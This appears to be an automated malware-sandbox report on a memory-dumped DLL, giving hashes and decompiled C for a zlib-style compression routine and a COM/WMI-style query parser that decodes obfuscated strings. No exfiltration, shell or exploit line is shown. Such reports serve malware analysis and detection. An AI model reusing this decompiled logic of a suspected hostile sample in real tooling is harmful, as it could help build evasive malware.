                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1518329722-0
                                    • Opcode ID: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
                                    • Instruction ID: efe317659bb93fd964c7109caf3faa3499ed084e9357a5ece8a85f8370063b94
                                    • Opcode Fuzzy Hash: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
                                    • Instruction Fuzzy Hash: BDE0DF7A8003186FD750EF788D46F9ABBFDEB80A00F018554AC85B3308E670EF048790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 99%
                                    			E10016EB0(intOrPtr _a4, signed int _a8, signed int _a12) {
                                    				signed int _v8;
                                    				signed short* _v12;
                                    				char _v16;
                                    				signed short _v20;
                                    				unsigned int _v24;
                                    				signed short _v28;
                                    				signed int _t223;
                                    				signed int _t235;
                                    				signed int _t237;
                                    				signed short _t240;
                                    				signed int _t241;
                                    				signed short _t244;
                                    				signed int _t245;
                                    				signed short _t248;
                                    				signed int _t249;
                                    				signed int _t250;
                                    				void* _t254;
                                    				signed char _t259;
                                    				signed int _t275;
                                    				signed int _t289;
                                    				signed int _t308;
                                    				signed short _t316;
                                    				signed int _t321;
                                    				void* _t329;
                                    				signed short _t330;
                                    				signed short _t333;
                                    				signed short _t334;
                                    				signed short _t343;
                                    				signed short _t346;
                                    				signed short _t347;
                                    				signed short _t348;
                                    				signed short _t358;
                                    				signed short _t361;
                                    				signed short _t362;
                                    				signed short _t363;
                                    				signed short _t370;
                                    				signed int _t373;
                                    				signed int _t378;
                                    				signed short _t379;
                                    				signed short _t382;
                                    				unsigned int _t388;
                                    				unsigned short _t390;
                                    				unsigned short _t392;
                                    				unsigned short _t394;
                                    				signed int _t396;
                                    				signed int _t397;
                                    				signed int _t398;
                                    				signed int _t400;
                                    				signed short _t401;
                                    				signed int _t402;
                                    				signed int _t403;
                                    				signed int _t407;
                                    				signed int _t409;
                                    
                                    				_t223 = _a8;
                                    				_t235 =  *(_t223 + 2) & 0x0000ffff;
                                    				_push(_t397);
                                    				_t388 = 0;
                                    				_t398 = _t397 | 0xffffffff;
                                    				if(_a12 < 0) {
                                    					L42:
                                    					return _t223;
                                    				} else {
                                    					_t329 =  !=  ? 7 : 0x8a;
                                    					_v12 = _t223 + 6;
                                    					_t254 = (0 | _t235 != 0x00000000) + 3;
                                    					_v16 = _a12 + 1;
                                    					do {
                                    						_v24 = _t388;
                                    						_t388 = _t388 + 1;
                                    						_a8 = _t235;
                                    						_a12 = _t235;
                                    						_v8 =  *_v12 & 0x0000ffff;
                                    						_t223 = _a4;
                                    						if(_t388 >= _t329) {
                                    							L4:
                                    							if(_t388 >= _t254) {
                                    								if(_a8 == 0) {
                                    									_t122 = _t223 + 0x16bc; // 0x8b3c7e89
                                    									_t400 =  *_t122;
                                    									if(_t388 > 0xa) {
                                    										_t168 = _t223 + 0xac4; // 0x5dc03300
                                    										_t330 =  *_t168 & 0x0000ffff;
                                    										_t169 = _t223 + 0xac6; // 0x55c35dc0
                                    										_t237 =  *_t169 & 0x0000ffff;
                                    										_v24 = _t330;
                                    										_t171 = _t223 + 0x16b8; // 0xfffffe8b
                                    										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
                                    										_v28 = _t333;
                                    										if(_t400 <= 0x10 - _t237) {
                                    											_t259 = _t400 + _t237;
                                    										} else {
                                    											_t173 = _t223 + 0x14; // 0xc703f045
                                    											 *(_t223 + 0x16b8) = _t333;
                                    											_t175 = _t223 + 8; // 0x8d000040
                                    											 *((char*)( *_t175 +  *_t173)) = _v28;
                                    											_t223 = _a4;
                                    											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    											_t181 = _t223 + 0x14; // 0xc703f045
                                    											_t182 = _t223 + 8; // 0x8d000040
                                    											_t183 = _t223 + 0x16b9; // 0x89fffffe
                                    											 *((char*)( *_t181 +  *_t182)) =  *_t183;
                                    											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    											_t333 = _v24 >> 0x10;
                                    											_t189 = _t223 + 0x16bc; // 0x8b3c7e89
                                    											_t259 =  *_t189 + 0xfffffff0 + _t237;
                                    										}
                                    										_t334 = _t333 & 0x0000ffff;
                                    										 *(_t223 + 0x16bc) = _t259;
                                    										 *(_t223 + 0x16b8) = _t334;
                                    										_t401 = _t334 & 0x0000ffff;
                                    										if(_t259 <= 9) {
                                    											_t209 = _t388 - 0xb; // -10
                                    											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
                                    											 *(_t223 + 0x16bc) = _t259 + 7;
                                    										} else {
                                    											_t193 = _t223 + 8; // 0x8d000040
                                    											_t390 = _t388 + 0xfffffff5;
                                    											_t194 = _t223 + 0x14; // 0xc703f045
                                    											_t240 = _t390 << _t259 | _t401;
                                    											 *(_t223 + 0x16b8) = _t240;
                                    											 *( *_t193 +  *_t194) = _t240;
                                    											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    											_t199 = _t223 + 0x14; // 0xc703f045
                                    											_t200 = _t223 + 8; // 0x8d000040
                                    											_t201 = _t223 + 0x16b9; // 0x89fffffe
                                    											 *((char*)( *_t199 +  *_t200)) =  *_t201;
                                    											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
                                    											 *(_t223 + 0x16b8) = _t390 >> 0x10;
                                    										}
                                    										goto L35;
                                    									}
                                    									_t123 = _t223 + 0xac0; // 0x4e9
                                    									_t343 =  *_t123 & 0x0000ffff;
                                    									_t124 = _t223 + 0xac2; // 0x33000000
                                    									_t241 =  *_t124 & 0x0000ffff;
                                    									_v24 = _t343;
                                    									_t126 = _t223 + 0x16b8; // 0xfffffe8b
                                    									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
                                    									_v28 = _t346;
                                    									if(_t400 > 0x10 - _t241) {
                                    										_t128 = _t223 + 0x14; // 0xc703f045
                                    										 *(_t223 + 0x16b8) = _t346;
                                    										_t130 = _t223 + 8; // 0x8d000040
                                    										 *((char*)( *_t130 +  *_t128)) = _v28;
                                    										_t223 = _a4;
                                    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    										_t136 = _t223 + 0x14; // 0xc703f045
                                    										_t137 = _t223 + 8; // 0x8d000040
                                    										_t138 = _t223 + 0x16b9; // 0x89fffffe
                                    										 *((char*)( *_t136 +  *_t137)) =  *_t138;
                                    										_t142 = _t223 + 0x16bc; // 0x8b3c7e89
                                    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    										_t346 = _v24 >> 0x10;
                                    										_t400 =  *_t142 + 0xfffffff0;
                                    									}
                                    									_t403 = _t400 + _t241;
                                    									_t347 = _t346 & 0x0000ffff;
                                    									 *(_t223 + 0x16bc) = _t403;
                                    									 *(_t223 + 0x16b8) = _t347;
                                    									_t348 = _t347 & 0x0000ffff;
                                    									if(_t403 <= 0xd) {
                                    										_t163 = _t403 + 3; // 0x8b3c7e8c
                                    										_t275 = _t163;
                                    										L28:
                                    										 *(_t223 + 0x16bc) = _t275;
                                    										_t165 = _t388 - 3; // -2
                                    										_t166 = _t223 + 0x16b8; // 0xfffffe8b
                                    										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
                                    									} else {
                                    										_t392 = _t388 + 0xfffffffd;
                                    										_t147 = _t223 + 0x14; // 0xc703f045
                                    										_t244 = _t392 << _t403 | _t348;
                                    										_t148 = _t223 + 8; // 0x8d000040
                                    										 *(_t223 + 0x16b8) = _t244;
                                    										 *( *_t148 +  *_t147) = _t244;
                                    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    										_t153 = _t223 + 0x14; // 0xc703f045
                                    										_t154 = _t223 + 8; // 0x8d000040
                                    										_t155 = _t223 + 0x16b9; // 0x89fffffe
                                    										 *((char*)( *_t153 +  *_t154)) =  *_t155;
                                    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
                                    										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
                                    									}
                                    									goto L35;
                                    								}
                                    								_t289 = _a12;
                                    								if(_t289 != _t398) {
                                    									_t53 = _t289 * 4; // 0x238830a
                                    									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
                                    									_t56 = _t235 * 4; // 0x830a74c0
                                    									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
                                    									_t58 = _t223 + 0x16bc; // 0x8b3c7e89
                                    									_t407 =  *_t58;
                                    									_v28 = _t370;
                                    									_t60 = _t223 + 0x16b8; // 0xfffffe8b
                                    									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
                                    									if(_t407 <= 0x10 - _t396) {
                                    										_t373 = _t249;
                                    										_t308 = _t407 + _t396;
                                    									} else {
                                    										_t61 = _t223 + 0x14; // 0xc703f045
                                    										_t62 = _t223 + 8; // 0x8d000040
                                    										 *(_t223 + 0x16b8) = _t249;
                                    										 *( *_t62 +  *_t61) = _t249;
                                    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    										_t67 = _t223 + 0x14; // 0xc703f045
                                    										_t68 = _t223 + 8; // 0x8d000040
                                    										_t69 = _t223 + 0x16b9; // 0x89fffffe
                                    										 *((char*)( *_t67 +  *_t68)) =  *_t69;
                                    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    										_t75 = _t223 + 0x16bc; // 0x8b3c7e89
                                    										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
                                    										_t308 =  *_t75 + 0xfffffff0 + _t396;
                                    									}
                                    									_t388 = _v24;
                                    									 *(_t223 + 0x16bc) = _t308;
                                    									 *(_t223 + 0x16b8) = _t373;
                                    								}
                                    								_t80 = _t223 + 0xabc; // 0x5d0674c0
                                    								_t358 =  *_t80 & 0x0000ffff;
                                    								_t81 = _t223 + 0x16bc; // 0x8b3c7e89
                                    								_t402 =  *_t81;
                                    								_t82 = _t223 + 0xabe; // 0x4e95d06
                                    								_t245 =  *_t82 & 0x0000ffff;
                                    								_v24 = _t358;
                                    								_t84 = _t223 + 0x16b8; // 0xfffffe8b
                                    								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
                                    								_v28 = _t361;
                                    								if(_t402 > 0x10 - _t245) {
                                    									_t86 = _t223 + 0x14; // 0xc703f045
                                    									 *(_t223 + 0x16b8) = _t361;
                                    									_t88 = _t223 + 8; // 0x8d000040
                                    									 *((char*)( *_t88 +  *_t86)) = _v28;
                                    									_t223 = _a4;
                                    									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    									_t94 = _t223 + 0x14; // 0xc703f045
                                    									_t95 = _t223 + 8; // 0x8d000040
                                    									_t96 = _t223 + 0x16b9; // 0x89fffffe
                                    									 *((char*)( *_t94 +  *_t95)) =  *_t96;
                                    									_t100 = _t223 + 0x16bc; // 0x8b3c7e89
                                    									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    									_t361 = _v24 >> 0x10;
                                    									_t402 =  *_t100 + 0xfffffff0;
                                    								}
                                    								_t403 = _t402 + _t245;
                                    								_t362 = _t361 & 0x0000ffff;
                                    								 *(_t223 + 0x16bc) = _t403;
                                    								 *(_t223 + 0x16b8) = _t362;
                                    								_t363 = _t362 & 0x0000ffff;
                                    								if(_t403 <= 0xe) {
                                    									_t121 = _t403 + 2; // 0x8b3c7e8b
                                    									_t275 = _t121;
                                    									goto L28;
                                    								} else {
                                    									_t394 = _t388 + 0xfffffffd;
                                    									_t105 = _t223 + 0x14; // 0xc703f045
                                    									_t248 = _t394 << _t403 | _t363;
                                    									_t106 = _t223 + 8; // 0x8d000040
                                    									 *(_t223 + 0x16b8) = _t248;
                                    									 *( *_t106 +  *_t105) = _t248;
                                    									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    									_t111 = _t223 + 0x14; // 0xc703f045
                                    									_t112 = _t223 + 8; // 0x8d000040
                                    									_t113 = _t223 + 0x16b9; // 0x89fffffe
                                    									 *((char*)( *_t111 +  *_t112)) =  *_t113;
                                    									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
                                    									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
                                    									goto L35;
                                    								}
                                    							} else {
                                    								_t316 = _t223 + (_t235 + 0x29f) * 4;
                                    								_v28 = _t316;
                                    								do {
                                    									_t378 = _a12;
                                    									_t22 = _t223 + 0x16bc; // 0x8b3c7e89
                                    									_t409 =  *_t22;
                                    									_t24 = _t378 * 4; // 0x238830a
                                    									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
                                    									_t379 =  *_t316 & 0x0000ffff;
                                    									_v24 = _t379;
                                    									_t27 = _t223 + 0x16b8; // 0xfffffe8b
                                    									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
                                    									_v20 = _t382;
                                    									if(_t409 <= 0x10 - _t250) {
                                    										_t321 = _t409 + _t250;
                                    									} else {
                                    										_t29 = _t223 + 0x14; // 0xc703f045
                                    										 *(_t223 + 0x16b8) = _t382;
                                    										_t31 = _t223 + 8; // 0x8d000040
                                    										 *((char*)( *_t31 +  *_t29)) = _v20;
                                    										_t223 = _a4;
                                    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    										_t37 = _t223 + 0x14; // 0xc703f045
                                    										_t38 = _t223 + 8; // 0x8d000040
                                    										_t39 = _t223 + 0x16b9; // 0x89fffffe
                                    										 *((char*)( *_t37 +  *_t38)) =  *_t39;
                                    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                    										_t382 = _v24 >> 0x10;
                                    										_t45 = _t223 + 0x16bc; // 0x8b3c7e89
                                    										_t321 =  *_t45 + 0xfffffff0 + _t250;
                                    									}
                                    									 *(_t223 + 0x16bc) = _t321;
                                    									_t316 = _v28;
                                    									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
                                    									_t388 = _t388 - 1;
                                    								} while (_t388 != 0);
                                    								L35:
                                    								_t235 = _v8;
                                    								_t388 = 0;
                                    								_t398 = _a12;
                                    								if(_t235 != 0) {
                                    									if(_a8 != _t235) {
                                    										_t329 = 7;
                                    										_t217 = _t329 - 3; // 0x4
                                    										_t254 = _t217;
                                    									} else {
                                    										_t329 = 6;
                                    										_t216 = _t329 - 3; // 0x3
                                    										_t254 = _t216;
                                    									}
                                    								} else {
                                    									_t329 = 0x8a;
                                    									_t214 = _t388 + 3; // 0x3
                                    									_t254 = _t214;
                                    								}
                                    								goto L41;
                                    							}
                                    						}
                                    						_t223 = _a4;
                                    						if(_t235 == _v8) {
                                    							_t235 = _v8;
                                    							goto L41;
                                    						}
                                    						goto L4;
                                    						L41:
                                    						_v12 =  &(_v12[2]);
                                    						_t221 =  &_v16;
                                    						 *_t221 = _v16 - 1;
                                    					} while ( *_t221 != 0);
                                    					goto L42;
                                    				}
                                    			}


                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Similarity
                                    • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                    • Instruction ID: 0c3308942ac57208bd8606007510a2814f56dadb0132f9c471c079d8b51e24d2
                                    • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                    • Instruction Fuzzy Hash: EEF16D755092518FC709CF18C4D48FA7BF1FFA9310B1A82F9D8999B3A6D731A980CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Similarity
                                    • Opcode ID: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                                    • Instruction ID: e10ac18f6a2dc82c047ac3a6231bc634579b0427d93bb8cac9548a9b95137502
                                    • Opcode Fuzzy Hash: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                                    • Instruction Fuzzy Hash: 817135356201758FE704CF2ADCD05BA33A1E78E34138AC629FA46CF395C535E626CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Similarity
                                    • Opcode ID: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
                                    • Instruction ID: 8b2308eb0caa98c5fc40748196c6a291e313b8726404b2d010a505a218b38381
                                    • Opcode Fuzzy Hash: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
                                    • Instruction Fuzzy Hash: 175157B3B041B00BDF588E3D8C642757ED35AC515270EC2BAF9A9CB24AE978C7059760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Similarity
                                    • Opcode ID: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
                                    • Instruction ID: 1f3934e2420efc180bb9c0cbc4fac13afaf5f650056083a87c6d8f741bd90931
                                    • Opcode Fuzzy Hash: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
                                    • Instruction Fuzzy Hash: 6E2192766150128BD35CDF2CD8A2A69F3A5FB48310F45427ED42BCB682CB71E492CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				void* _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				intOrPtr _v40;
                                    				signed int _v44;
                                    				char _v48;
                                    				char _v52;
                                    				intOrPtr _v56;
                                    				signed int _v60;
                                    				char* _v72;
                                    				signed short _v80;
                                    				signed int _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				intOrPtr _v100;
                                    				char _v104;
                                    				char _v616;
                                    				intOrPtr* _t159;
                                    				char _t165;
                                    				signed int _t166;
                                    				signed int _t173;
                                    				signed int _t178;
                                    				signed int _t186;
                                    				intOrPtr* _t187;
                                    				signed int _t188;
                                    				signed int _t192;
                                    				intOrPtr* _t193;
                                    				intOrPtr _t200;
                                    				intOrPtr* _t205;
                                    				signed int _t207;
                                    				signed int _t209;
                                    				intOrPtr* _t210;
                                    				intOrPtr _t212;
                                    				intOrPtr* _t213;
                                    				signed int _t214;
                                    				char _t217;
                                    				signed int _t218;
                                    				signed int _t219;
                                    				signed int _t230;
                                    				signed int _t235;
                                    				signed int _t242;
                                    				signed int _t243;
                                    				signed int _t244;
                                    				signed int _t245;
                                    				intOrPtr* _t247;
                                    				intOrPtr* _t251;
                                    				signed int _t252;
                                    				intOrPtr* _t253;
                                    				void* _t255;
                                    				intOrPtr* _t261;
                                    				signed int _t262;
                                    				signed int _t283;
                                    				signed int _t289;
                                    				char* _t298;
                                    				void* _t320;
                                    				signed int _t322;
                                    				intOrPtr* _t323;
                                    				intOrPtr _t324;
                                    				signed int _t327;
                                    				intOrPtr* _t328;
                                    				intOrPtr* _t329;
                                    
                                    				_v32 = _v32 & 0x00000000;
                                    				_v60 = _v60 & 0x00000000;
                                    				_v56 = __edx;
                                    				_v100 = __ecx;
                                    				_t159 = E1000D523(__ecx);
                                    				_t251 = _t159;
                                    				_v104 = _t251;
                                    				if(_t251 == 0) {
                                    					return _t159;
                                    				}
                                    				_t320 = E10008604(0x10);
                                    				_v36 = _t320;
                                    				_pop(_t255);
                                    				if(_t320 == 0) {
                                    					L53:
                                    					E1000861A( &_v60, 0xfffffffe);
                                    					E1000D5D7( &_v104);
                                    					return _t320;
                                    				}
                                    				_t165 = E100095E1(_t255, 0x536);
                                    				 *_t328 = 0x609;
                                    				_v52 = _t165;
                                    				_t166 = E100095E1(_t255);
                                    				_push(0);
                                    				_push(_v56);
                                    				_v20 = _t166;
                                    				_push(_t166);
                                    				_push(_a4);
                                    				_t322 = E100092E5(_t165);
                                    				_v60 = _t322;
                                    				E100085D5( &_v52);
                                    				E100085D5( &_v20);
                                    				_t329 = _t328 + 0x20;
                                    				if(_t322 != 0) {
                                    					_t323 = __imp__#2;
                                    					_v40 =  *_t323(_t322);
                                    					_t173 = E100095E1(_t255, 0x9e4);
                                    					_v20 = _t173;
                                    					_v52 =  *_t323(_t173);
                                    					E100085D5( &_v20);
                                    					_t324 = _v40;
                                    					_t261 =  *_t251;
                                    					_t252 = 0;
                                    					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                    					__eflags = _t178;
                                    					if(_t178 != 0) {
                                    						L52:
                                    						__imp__#6(_t324);
                                    						__imp__#6(_v52);
                                    						goto L53;
                                    					}
                                    					_t262 = _v32;
                                    					_v28 = 0;
                                    					_v20 = 0;
                                    					__eflags = _t262;
                                    					if(_t262 == 0) {
                                    						L49:
                                    						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                    						__eflags = _t252;
                                    						if(_t252 == 0) {
                                    							E1000861A( &_v36, 0);
                                    							_t320 = _v36;
                                    						} else {
                                    							 *(_t320 + 8) = _t252;
                                    							 *_t320 = E100091E3(_v100);
                                    							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
                                    						}
                                    						goto L52;
                                    					} else {
                                    						goto L6;
                                    					}
                                    					while(1) {
                                    						L6:
                                    						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                    						__eflags = _t186;
                                    						if(_t186 != 0) {
                                    							break;
                                    						}
                                    						_v16 = 0;
                                    						_v48 = 0;
                                    						_v12 = 0;
                                    						_v24 = 0;
                                    						__eflags = _v84;
                                    						if(_v84 == 0) {
                                    							break;
                                    						}
                                    						_t187 = _v28;
                                    						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                    						__eflags = _t188;
                                    						if(_t188 >= 0) {
                                    							__imp__#20(_v24, 1,  &_v16);
                                    							__imp__#19(_v24, 1,  &_v48);
                                    							_t46 = _t320 + 0xc; // 0xc
                                    							_t253 = _t46;
                                    							_t327 = _t252 << 3;
                                    							_t47 = _t327 + 8; // 0x8
                                    							_t192 = E10008698(_t327, _t47);
                                    							__eflags = _t192;
                                    							if(_t192 == 0) {
                                    								__imp__#16(_v24);
                                    								_t193 = _v28;
                                    								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                    								L46:
                                    								_t252 = _v20;
                                    								break;
                                    							}
                                    							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                    							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
                                    							_t200 =  *_t253;
                                    							__eflags =  *(_t327 + _t200 + 4);
                                    							if( *(_t327 + _t200 + 4) == 0) {
                                    								_t136 = _t320 + 0xc; // 0xc
                                    								E1000861A(_t136, 0);
                                    								E1000861A( &_v36, 0);
                                    								__imp__#16(_v24);
                                    								_t205 = _v28;
                                    								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                    								_t320 = _v36;
                                    								goto L46;
                                    							}
                                    							_t207 = _v16;
                                    							while(1) {
                                    								_v12 = _t207;
                                    								__eflags = _t207 - _v48;
                                    								if(_t207 > _v48) {
                                    									break;
                                    								}
                                    								_v44 = _v44 & 0x00000000;
                                    								_t209 =  &_v12;
                                    								__imp__#25(_v24, _t209,  &_v44);
                                    								__eflags = _t209;
                                    								if(_t209 < 0) {
                                    									break;
                                    								}
                                    								_t212 = E100091E3(_v44);
                                    								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                    								_t213 = _v28;
                                    								_t281 =  *_t213;
                                    								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                    								__eflags = _t214;
                                    								if(_t214 < 0) {
                                    									L39:
                                    									__imp__#6(_v44);
                                    									_t207 = _v12 + 1;
                                    									__eflags = _t207;
                                    									continue;
                                    								}
                                    								_v92 = E100095E1(_t281, 0x250);
                                    								 *_t329 = 0x4cc;
                                    								_t217 = E100095E1(_t281);
                                    								_t283 = _v80;
                                    								_v96 = _t217;
                                    								_t218 = _t283 & 0x0000ffff;
                                    								__eflags = _t218 - 0xb;
                                    								if(__eflags > 0) {
                                    									_t219 = _t218 - 0x10;
                                    									__eflags = _t219;
                                    									if(_t219 == 0) {
                                    										L35:
                                    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                                    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                    										__eflags = _t289;
                                    										if(_t289 == 0) {
                                    											L38:
                                    											E100085D5( &_v92);
                                    											E100085D5( &_v96);
                                    											__imp__#9( &_v80);
                                    											goto L39;
                                    										}
                                    										_push(_v72);
                                    										_push(L"%d");
                                    										L37:
                                    										_push(0xc);
                                    										_push(_t289);
                                    										E10009640();
                                    										_t329 = _t329 + 0x10;
                                    										goto L38;
                                    									}
                                    									_t230 = _t219 - 1;
                                    									__eflags = _t230;
                                    									if(_t230 == 0) {
                                    										L33:
                                    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                                    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                    										__eflags = _t289;
                                    										if(_t289 == 0) {
                                    											goto L38;
                                    										}
                                    										_push(_v72);
                                    										_push(L"%u");
                                    										goto L37;
                                    									}
                                    									_t235 = _t230 - 1;
                                    									__eflags = _t235;
                                    									if(_t235 == 0) {
                                    										goto L33;
                                    									}
                                    									__eflags = _t235 == 1;
                                    									if(_t235 == 1) {
                                    										goto L33;
                                    									}
                                    									L28:
                                    									__eflags = _t283 & 0x00002000;
                                    									if((_t283 & 0x00002000) == 0) {
                                    										_v88 = E100095E1(_t283, 0x219);
                                    										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                    										E100085D5( &_v88);
                                    										_t329 = _t329 + 0x18;
                                    										_t298 =  &_v616;
                                    										L31:
                                    										_t242 = E100091E3(_t298);
                                    										L32:
                                    										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                    										goto L38;
                                    									}
                                    									_t242 = E1000DA20( &_v80);
                                    									goto L32;
                                    								}
                                    								if(__eflags == 0) {
                                    									__eflags = _v72 - 0xffff;
                                    									_t298 = L"TRUE";
                                    									if(_v72 != 0xffff) {
                                    										_t298 = L"FALSE";
                                    									}
                                    									goto L31;
                                    								}
                                    								_t243 = _t218 - 1;
                                    								__eflags = _t243;
                                    								if(_t243 == 0) {
                                    									goto L38;
                                    								}
                                    								_t244 = _t243 - 1;
                                    								__eflags = _t244;
                                    								if(_t244 == 0) {
                                    									goto L35;
                                    								}
                                    								_t245 = _t244 - 1;
                                    								__eflags = _t245;
                                    								if(_t245 == 0) {
                                    									goto L35;
                                    								}
                                    								__eflags = _t245 != 5;
                                    								if(_t245 != 5) {
                                    									goto L28;
                                    								}
                                    								_t298 = _v72;
                                    								goto L31;
                                    							}
                                    							__imp__#16(_v24);
                                    							_t210 = _v28;
                                    							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                    							_t252 = _v20;
                                    							L42:
                                    							_t262 = _v32;
                                    							_t252 = _t252 + 1;
